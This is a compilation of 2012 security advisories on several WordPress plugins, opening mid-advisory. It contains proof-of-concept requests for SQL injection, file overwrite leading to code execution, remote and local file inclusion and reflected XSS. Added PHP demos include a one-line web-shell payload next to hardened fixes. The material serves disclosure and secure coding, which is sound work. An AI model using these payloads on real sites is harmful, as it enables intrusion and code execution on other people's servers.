We can observe AJAX in action and as a result a download link appears:
http://localhost/wp342/wp-content/inventory_downloadables/my_download_jw82ku0jz9_43.php

Opening that download link will execute the previously uploaded php file.

### 2. SQL Injection Vulnerability in "documenthandler.php" ###

Reasons: Insufficient sanitization of user-supplied data

Attack vectors: User-supplied POST parameter "prefix"

Preconditions: Logged in as admin with FoxyPress product editing privileges

Php script "documenthandler.php" line 14:

[ source code start ]--
if (!empty($_FILES)) {
    $inventory_id = intval( $_POST['inventory_id'] );
    $downloadabletable = $_POST['prefix'];
...
    $query = "INSERT INTO " . $downloadabletable . " SET inventory_id='" . $inventory_id . "', filename='" . mysql_escape_string($newfilename) . "', maxdownloads= '" . mysql_escape_string($downloadablemaxdownloads) . "', status = 1";
    $wpdb->query($query);
[ source code end ]

We can see that the user-supplied POST parameter "prefix" is used in the subsequent SQL "INSERT INTO" query as the table name. There is no input data sanitization, therefore an attacker is able to insert any data into any table in the current database.

Test (parameter "security" must be valid):

-[ test code start ]---
[ HTML test form (multipart/form-data); input fields lost in extraction. POSTs to: ]
http://localhost/wp342/wp-admin/admin-ajax.php?action=foxypress_download&security=844b64ce45
--[ test code end ]

Result (Wordpress must be set to show SQL errors):

WordPress database error: [Table 'wp342.waraxe' doesn't exist]
INSERT INTO waraxe SET inventory_id='0', filename='downloadable_qga73aojs8_0.php', maxdownloads= '1', status = 1

### 3. SQL Injection Vulnerability in "foxypress-manage-emails.php" ###

Reasons: Insufficient sanitization of user-supplied data

Attack vectors: User-supplied GET parameter "id"

Preconditions: Logged in as admin with FoxyPress management privileges

Php script "
[Full-disclosure] [waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin
[waraxe-2012-SA#094] - Multiple Vulnerabilities in Wordpress GRAND Flash Album Gallery Plugin
==============================================================================================

Author: Janek Vind "waraxe"
Date: 24. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-94.html

Description of vulnerable target:
~~~

Try GRAND Flash Album Gallery - powerful flash & jQuery media content plugin. It provides a comprehensive interface for handling image galleries, audio and video. You can edit your media content the way you want: upload images, import music and video, create photo gallery, music playlists, group pictures in slideshow and add descriptions for each image, mp3 or video - GRAND FlAGallery is the smart choice when showing the best of your product or describing in brief any event.

http://codeasily.com/wordpress-plugins/flash-album-gallery/flag
http://wordpress.org/extend/plugins/flash-album-gallery/

Affected versions: 1.9.0, 2.0.0

### 1. Arbitrary File Overwrite Vulnerability in "admin/skin_options.php" ###

Reasons:
1. Insecure use of "parse_str()"
2. Uninitialized variable "$mainXML"

Attack vector: User-supplied POST parameters "settingsXML" and "mainXML"

Precondition: Logged in as admin with "FlAG Change skin" privileges

Php script "admin/skin_options.php" line:

[ source code start ]--

$settingsXML = $settings.'/settings.xml';
$flashPost = file_get_contents("php://input");
// parse properties_skin
parse_str($flashPost);
if(isset($properties_skin) && !empty($properties_skin)) {
    $fp = fopen($settingsXML, "r");
    if(!$fp) {
        exit( "2");//Failure - not read;
    }
    while(!feof($fp)) {
        $mainXML .= fgetc($fp);
    }
    $fp = fopen($settingsXML, "w");
    if(!$fp) exit("0");//Failure
    $newProperties = preg_replace("|.*?|si", $properties_skin, $mainXML);
    fwrite($fp, $newProperties);
    fclose($fp);
    echo "1";//Save

[ source code end ]

As we can observe, the PHP function "parse_str()" is called with the raw POST body as its only argument. This is a dangerous coding pattern: every key in the request body becomes a variable in the current scope, so the request can overwrite any variable that was set before this line.

The attacker can overwrite the variable "$settingsXML", which the following lines use as the path of the file being rewritten, so the attacker can choose any file on the remote system that the web server can write to. The next problem is that the variable "$mainXML" is uninitialized. The attacker can seed it with arbitrary data through the same "parse_str()" call, and because the script appends the original file content to it with ".=", the attacker's data ends up prepended to the file while the original content is preserved after it. This lets the attacker inject PHP code into an existing .php file on the remote system, which ultimately leads to RCE (Remote Code Execution).

Test (file "wp-content/plugins/hello.php" must exist and be writable):

-[ test code start ]---

http://localhost/wp342/wp-content/plugins/flash-album-gallery/admin/skin_options.php"; method="post">

--[ test code end ]

Injected php code can be executed by the following request:

http://localhost/wp342/wp-content/plugins/hello.php

### 2. Arbitrary File Overwrite Vulnerability in "lib/constructor.php" ###

Reasons:
1. Insecure use of "parse_str()"
2. Uninitialized variable "$mainXML"

Attack vector: User-supplied POST parameters "skin_name" and "mainXML"

Preconditions:
1. Logged in as admin with "FlAG Change skin" privileges
2. "magic_quotes_gpc=off" for successful null-byte attacks
3. PHP must be < 5.3.4 for successful null-byte attacks

Php script "lib/constructor.php" line 25:

[ source code start ]--

$flashPost = file_get_contents("php://input");
// parse properties_skin
parse_str($flashPost);
$settingsXML = str_replace("\\","/", dirname(dirname(dirname(__FILE__))). '/flagallery-skins/'.$skin_name.'/settings/settings.xml');
if(isset($properties_skin) && !empty($properties_skin)) {
    $fp
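The following is an added example and not code from the GRAND Flash Album Gallery plugin. It shows, for issue 1, how a one-argument "parse_str()" on the raw POST body replaces "$settingsXML" and pre-seeds "$mainXML" and, for issue 2, how a traversal in "skin_name" reaches outside the skins directory, next to one hardened shape that covers both handlers: parse into a dedicated array, initialise every accumulator, accept only a plain directory name as the skin and pin the resolved path under the skins directory. The constant SKINS_DIR, the function names and the request body are constructed for this demonstration.

```php
<?php
// Added example, not code from the GRAND Flash Album Gallery plugin.
// SKINS_DIR and the request body are assumptions made for this demo.

define('SKINS_DIR', '/var/www/wp-content/flagallery-skins');

// Constructed attacker body: redirects the write to hello.php, prepends PHP
// code (mainXML) and carries a traversal in skin_name for the second handler.
$flashPost = 'settingsXML=' . rawurlencode('/var/www/wp-content/plugins/hello.php')
           . '&mainXML=' . rawurlencode("<?php system(\$_GET['c']); ?>\n")
           . '&properties_skin=' . rawurlencode('<properties></properties>')
           . '&skin_name=' . rawurlencode('../../plugins');

// Vulnerable shape, as in admin/skin_options.php: with a single argument,
// parse_str() imports every key of the body as a variable in this scope.
// PHP 8.0 removed the one-argument form, so this only runs on older releases.
function vulnerable_target($flashPost) {
    $settingsXML = SKINS_DIR . '/default/settings/settings.xml';
    parse_str($flashPost);                       // clobbers $settingsXML, creates $mainXML
    $prefix = isset($mainXML) ? $mainXML : '';   // the script never initialised $mainXML
    return array('path' => $settingsXML, 'prefix' => $prefix);
}

// Hardened shape: parse into $p so nothing reaches local scope, initialise
// the accumulator, accept only a directory name as the skin (no "/", "..",
// or null bytes can pass the pattern) and require the resolved directory to
// exist inside SKINS_DIR.
function hardened_target($flashPost) {
    parse_str($flashPost, $p);
    $mainXML   = '';
    $skin_name = isset($p['skin_name']) ? (string) $p['skin_name'] : 'default';

    if (!preg_match('/^[A-Za-z0-9_-]+$/', $skin_name)) {
        return array('error' => 'invalid skin name: ' . $skin_name);
    }
    $settingsXML = SKINS_DIR . '/' . $skin_name . '/settings/settings.xml';

    $dir  = realpath(dirname($settingsXML));
    $base = realpath(SKINS_DIR);
    if ($dir === false || $base === false || strpos($dir . '/', rtrim($base, '/') . '/') !== 0) {
        return array('error' => 'skin directory missing or outside SKINS_DIR');
    }
    return array(
        'path'            => $settingsXML,
        'prefix'          => $mainXML,
        'properties_skin' => isset($p['properties_skin']) ? $p['properties_skin'] : '',
    );
}

if (PHP_VERSION_ID < 80000) {
    print_r(vulnerable_target($flashPost));   // path points at hello.php, prefix holds the PHP code
}
print_r(hardened_target($flashPost));         // rejects "../../plugins" before any path is built
```

Run from the command line, the vulnerable function reports hello.php as the write target and the injected PHP as the data that would be prepended, while the hardened one rejects the request on the skin name alone. The realpath check is the second line of defence for the case where a skin name passes the pattern but the directory has been moved or symlinked outside SKINS_DIR.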
[Full-disclosure] [waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin
[waraxe-2012-SA#093] - Multiple Vulnerabilities in Wordpress Social Discussions Plugin
======================================================================================

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-93.html

Description of vulnerable target:
~~~

Enables Social Sharing of your blog posts to 30+ Social Networks. Plugin also enables you to Automatically Publish or Self Publish your Blog Posts to 25+ Networks.

http://wordpress.org/extend/plugins/social-discussions/

Affected version: 6.1.1

### 1. Remote File Inclusion in "social-discussions-networkpub_ajax.php" ###

Reasons: Uninitialized variable "$HTTP_ENV_VARS"

Attack vectors: User-supplied parameter "HTTP_ENV_VARS"

Preconditions:
1. register_globals=on
2. register_long_arrays=off
3. allow_url_include=on for RFI if PHP >= 5.2.0
4. PHP must be < 5.3.4 for LFI null-byte attacks
5. magic_quotes_gpc=off for LFI null-byte attacks

Php script "social-discussions-networkpub_ajax.php" line 2:

[ source code start ]--

if (!function_exists('add_action')){
    @include_once($GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php");

[ source code end ]

We can see that the script expects the old-style array "HTTP_ENV_VARS" to be populated and to contain a "DOCUMENT_ROOT" entry. But when the PHP directive "register_long_arrays=off" is set, PHP never populates "HTTP_ENV_VARS", and if at the same time "register_globals=on", a request parameter named "HTTP_ENV_VARS" fills that array with attacker-chosen values. The include path is then built from attacker input, leading to RFI (Remote File Inclusion), or to LFI (Local File Inclusion) when a null byte is used to cut off the "/wp-config.php" suffix.

Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub_ajax.php?HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z

### 2. Full Path Disclosure in multiple scripts ###

Reasons: Direct request to php script triggers pathname leak in error message

Preconditions: PHP directive display_errors=on

Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions-networkpub.php

Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social-discussions.php

Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social-discussions-networkpub.php on line 2

http://localhost/wp342/wp-content/plugins/social-discussions/social_discussions_service_names.php

Fatal error: Call to undefined function __() in C:\apache_www\wp342\wp-content\plugins\social-discussions\social_discussions_service_names.php on line 3

Contact:
~~~

come2war...@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/

-- [ EOF ]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
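The following is an added example and not code from the Social Discussions plugin. It reproduces the include-path problem from issue 1 of SA#093 with "register_globals=on" emulated by copying the parsed query string into $GLOBALS, feeds it the advisory's two test query strings, and contrasts it with a bootstrap that refuses direct requests and, where a file must be included, validates the path (no stream wrapper, no null byte, resolved inside the WordPress root). The function names, the constant WP_ROOT and its derivation from the script location are assumptions made for this demonstration.

```php
<?php
// Added example, not code from the Social Discussions plugin.
// WP_ROOT (three directories above this script, as for a file living in
// wp-content/plugins/<plugin>/) is an assumption made for this demo.

define('WP_ROOT', dirname(dirname(dirname(__DIR__))));

// Emulates register_globals=on with register_long_arrays=off: PHP would not
// create $HTTP_ENV_VARS itself, so the request's HTTP_ENV_VARS[] lands in it.
function emulate_register_globals($queryString) {
    parse_str($queryString, $params);
    foreach ($params as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Vulnerable shape from social-discussions-networkpub_ajax.php line 2,
// returning the path it would hand to include_once() instead of including it.
function vulnerable_bootstrap_path() {
    return $GLOBALS['HTTP_ENV_VARS']['DOCUMENT_ROOT'] . "/wp-config.php";
}

// Returns a canonical local path inside $root, or null when the candidate is
// a stream wrapper (http://, php://, data:), contains a null byte, does not
// exist, or resolves outside $root. Schemes must be two or more characters so
// a Windows drive letter such as "C:" is not mistaken for one.
function safe_include_path($candidate, $root) {
    if (strpos($candidate, "\0") !== false) {
        return null;
    }
    if (preg_match('#^[a-z][a-z0-9+.-]+:#i', $candidate)) {
        return null;
    }
    $real     = realpath($candidate);
    $rootReal = realpath($root);
    if ($real === false || $rootReal === false) {
        return null;
    }
    $prefix = rtrim($rootReal, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    return strpos($real, $prefix) === 0 ? $real : null;
}

// Hardened shape: a plugin file loaded by WordPress already has add_action(),
// so a direct request is simply refused; the include path never comes from
// the request and is still validated before use.
function hardened_bootstrap_path() {
    if (function_exists('add_action')) {
        return null;   // already inside WordPress, nothing to bootstrap
    }
    return safe_include_path(WP_ROOT . '/wp-config.php', WP_ROOT);
}

// The two test requests from the advisory, replayed through the emulation.
foreach (array('HTTP_ENV_VARS[DOCUMENT_ROOT]=http://php.net/?',
               'HTTP_ENV_VARS[DOCUMENT_ROOT]=/proc/self/environ%00z') as $qs) {
    emulate_register_globals($qs);
    $v = vulnerable_bootstrap_path();
    $s = safe_include_path($v, WP_ROOT);
    echo "request: $qs\n";
    echo "  vulnerable include path: " . addcslashes($v, "\0") . "\n";
    echo "  safe_include_path():     " . ($s === null ? 'refused' : $s) . "\n";
}
$h = hardened_bootstrap_path();
echo "hardened bootstrap path: " . ($h === null ? 'refused' : $h) . "\n";
```

The first request yields an "http://php.net/?/wp-config.php" include target, which is exactly the RFI case that "allow_url_include=on" turns into code execution; the second yields "/proc/self/environ\0z/wp-config.php", where PHP releases before 5.3.4 stopped reading the path at the null byte. Both are refused by the validator, and the hardened bootstrap never consults the request in the first place.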
[Full-disclosure] [waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin
[waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin
=============================================================================

Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-92.html

Description of vulnerable target:
~~~

Slideshow provides an easy way to integrate a slideshow for any WordPress installation. Any image can be loaded into the slideshow by picking it from the WordPress media page, even images you've already uploaded can be inserted into your slideshow right away!

http://wordpress.org/extend/plugins/slideshow-jquery-image-gallery/

Affected version: 2.1.12

### 1. Reflected XSS in "views/SlideshowPlugin/slideshow.php" ###

Reasons:
1. Uninitialized variables "$randomId", "$slides" and "$settings"
2. Improper encoding or escaping of output

Attack vectors: User-supplied parameters "randomId", "slides" and "settings"

Preconditions: PHP directive register_globals=on

These view templates are meant to be included by the plugin with the variables already set. When a template is requested directly and "register_globals=on", the request supplies those variables instead, and their values are echoed into the page without escaping.

Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=";>alert(123);

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=alert(123);

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings=

### 2. Reflected XSS in "views/SlideshowPluginPostType/settings.php" ###

Reasons:
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output

Attack vectors: User-supplied parameters "settings" and "inputFields"

Preconditions: PHP directive register_globals=on

Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=alert(123);

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[0][]&inputFields[0]=alert(123);

### 3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php" ###

Reasons:
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output

Attack vectors: User-supplied parameters "settings" and "inputFields"

Preconditions: PHP directive register_globals=on

Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=alert(123);

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=alert(123);

### 4. Full Path Disclosure in multiple scripts ###

Reasons: Direct request to php script triggers pathname leak in error message

Preconditions: PHP directive display_errors=on

Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/slideshow.php

Fatal error: Call to undefined function add_action() in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\slideshow.php on line 34

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/classes/SlideshowPluginWidget.php

Fatal error: Class 'WP_Widget' not found in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\classes\SlideshowPluginWidget.php on line 8

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php

Fatal error: Class 'SlideshowPluginMain' not found in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPlugin\slideshow.php on line 111

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/information.php

Fatal error: Call to undefined function _e() in C:\apache_www\wp342\wp-content\plugins\slideshow-jquery-image-gallery\views\SlideshowPluginPostType\information.php on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/Slides
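The following is an added example and not code from the Slideshow plugin. It contrasts a view template that echoes variables it never initialised, which is the pattern behind issues 1 to 3 of SA#092, with one that refuses direct requests (which also removes the fatal-error path disclosure of issue 4, since no fatal error is reached), takes its inputs as explicit parameters with defaults and escapes every value at the output point. "register_globals=on" is emulated with extract(), the function names are invented for the demonstration, and the payload is a constructed sample in the style of the advisory's tests.

```php
<?php
// Added example, not code from the Slideshow plugin. Function names and the
// sample request are assumptions made for this demo.

// Parses one request's query string; the caller decides what to do with it.
function request_params($queryString) {
    parse_str($queryString, $params);
    return $params;
}

// Vulnerable view: $randomId and $slides are expected from the including
// plugin code, but extract() plays the role of register_globals and lets a
// direct request define them. Nothing is escaped on output.
function render_vulnerable($queryString) {
    extract(request_params($queryString));       // defines $randomId, $slides, ...
    $html = '<div class="slideshow" id="slideshow_' . $randomId . '">';
    foreach ((array) $slides as $slide) {
        $html .= '<h2>' . $slide['title'] . '</h2>';
    }
    return $html . '</div>';
}

// HTML escaping with explicit flags: the default of older PHP leaves single
// quotes alone, which matters inside attribute values.
function h($value) {
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Hardened view: inputs arrive as parameters with defaults, a direct request
// is refused, the element id is restricted to a safe character set and every
// value is escaped where it is written into the markup.
function render_hardened($randomId = '', array $slides = array(), $insideWordPress = false) {
    if (!$insideWordPress) {
        return '';                               // stands in for: if (!defined('ABSPATH')) exit;
    }
    if (!preg_match('/^[A-Za-z0-9_]+$/', $randomId)) {
        $randomId = 'slideshow';
    }
    $html = '<div class="slideshow" id="slideshow_' . h($randomId) . '">';
    foreach ($slides as $slide) {
        $title = isset($slide['title']) ? $slide['title'] : '';
        $html .= '<h2>' . h($title) . '</h2>';
    }
    return $html . '</div>';
}

// Constructed request in the style of the advisory's tests.
$payload = 'randomId=' . rawurlencode('"><script>alert(123);</script>')
         . '&slides[0][type]=text&slides[0][title]=' . rawurlencode('<script>alert(123);</script>');

echo "vulnerable, direct request:\n  " . render_vulnerable($payload) . "\n";
echo "hardened, direct request:\n  [" . render_hardened('x', array(), false) . "]\n";

// Even when the plugin itself passes hostile values (a title stored by a
// lower-privileged author, for instance), the output stays inert.
$p = request_params($payload);
echo "hardened, loaded by WordPress:\n  " . render_hardened($p['randomId'], $p['slides'], true) . "\n";
```

The vulnerable output carries both script tags verbatim into the page; the hardened view renders nothing on a direct request and, when called by the plugin with the same values, emits "&lt;script&gt;" in the heading and falls back to a fixed id. Disabling "display_errors" in production is still worth doing for issue 4, but the guard at the top of each directly reachable file is what removes the leak at its source.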